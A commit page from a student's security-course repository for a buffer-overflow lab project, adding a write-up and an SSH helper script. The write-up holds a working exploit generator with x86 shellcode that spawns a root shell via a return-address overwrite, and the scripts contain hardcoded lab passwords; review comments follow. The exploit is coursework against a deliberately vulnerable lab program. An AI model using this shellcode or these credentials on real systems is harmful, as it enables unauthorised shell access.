recolic-hust / cs161 / Commits / 62aac5ca
Commit 62aac5ca authored 6 years ago by Recolic Keghart
p1 done
parent 2b81d226
Showing 2 changed files with 51 additions and 4 deletions

- proj1/explain.md: 43 additions, 1 deletion
- proj1/ssh.sh: 8 additions, 3 deletions
proj1/explain.md (+43 −1)
# 1
#
# 1
The makefile is interesting and I think the professor tried his best to
make the program unsafe.
...
...
@@ -56,3 +56,45 @@ You have to let it all go. Fear, doubt, and disbelief. Free your mind.
Next username: smith
Next password: 37ZFBrAPm8
```
My code is attached below
```
############# egg3
#!/usr/bin/python3
def fuck8(txt):
assert(len(txt) == 8)
return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
def revert(txt):
assert(len(txt) % 8 == 0)
res = ""
for i in range(int(len(txt) / 8)):
res += fuck8(txt[i*8:(i+1)*8])
return res
fill = "0123456789abcdef0123456789abcdef01234567"
#cs161-ace# raddr = "bffffa40"
#cs161-atw# raddr = "bffffad0"
raddr = "bffffad0"
#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
########################################################################################### <- append an endline (0x0a, \n)
payload = revert(fill) + revert(raddr) + (shellcode)
print(payload)
import binascii
b = binascii.unhexlify(payload)
with open('input.txt','wb+') as f:
f.write(b)
############# egg
#!/bin/bash
./egg3 > /dev/null
cat input.txt # | invoke dejavu
```
## 2
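Review bot: the helper `fuck8` in the egg3 listing needs a descriptive name, since it reverses the byte order of one 4-byte word written as 8 hex digits, and the loop bound `int(len(txt) / 8)` in `revert` should be `len(txt) // 8` so it stays in integer arithmetic. `import binascii` sits after `print(payload)` and belongs at the top of the script. The single untagged fence holds two separate files (the Python `egg3` and the bash `egg`); splitting them into two fences with language tags would make the write-up easier to read, and a short comment on where `fill` and the active `raddr` come from would explain why two other `raddr` values are left commented out.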
proj1/ssh.sh (+8 −3)
#!/bin/sh
#echo 'Use password r4e8kWpeFC'
#ssh vsftpd@localhost -p 16161
sshpass
-p
r4e8kWpeFC ssh
-o
PreferredAuthentications
=
password
-o
PubkeyAuthentication
=
no vsftpd@localhost
-p
16161
if
[[
$1
==
remote
]]
;
then
echo
'Connecting ucb cs161 autograde machine...'
u
=
atw
ssh
-t
cs161-
$u
@hive
$((
36
#${u:2}%26+1)).cs.berkeley.edu \~cs161/proj1/start
else
echo
'Connecting localhost...'
sshpass
-
p r4e8kWpeFC ssh
-
o
PreferredAuthentications
=
password
-
o
PubkeyAuthentication
=
no vsftpd@localhost
-
p
16161
fi
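Review bot: the shebang is still `#!/bin/sh`, but the new branch relies on `[[ $1 == remote ]]`, `${u:2}` and the `36#` base prefix inside `$(( ))`, all of which are bash extensions and fail under a POSIX `sh` such as dash; change the first line to `#!/bin/bash`. The local branch also keeps the password as a literal argument to `sshpass -p`, where it is visible in the process list and is stored in the repository; reading it with `sshpass -e` from the `SSHPASS` environment variable, or with `-f` from a file kept out of version control, removes it from both the argument list and the script.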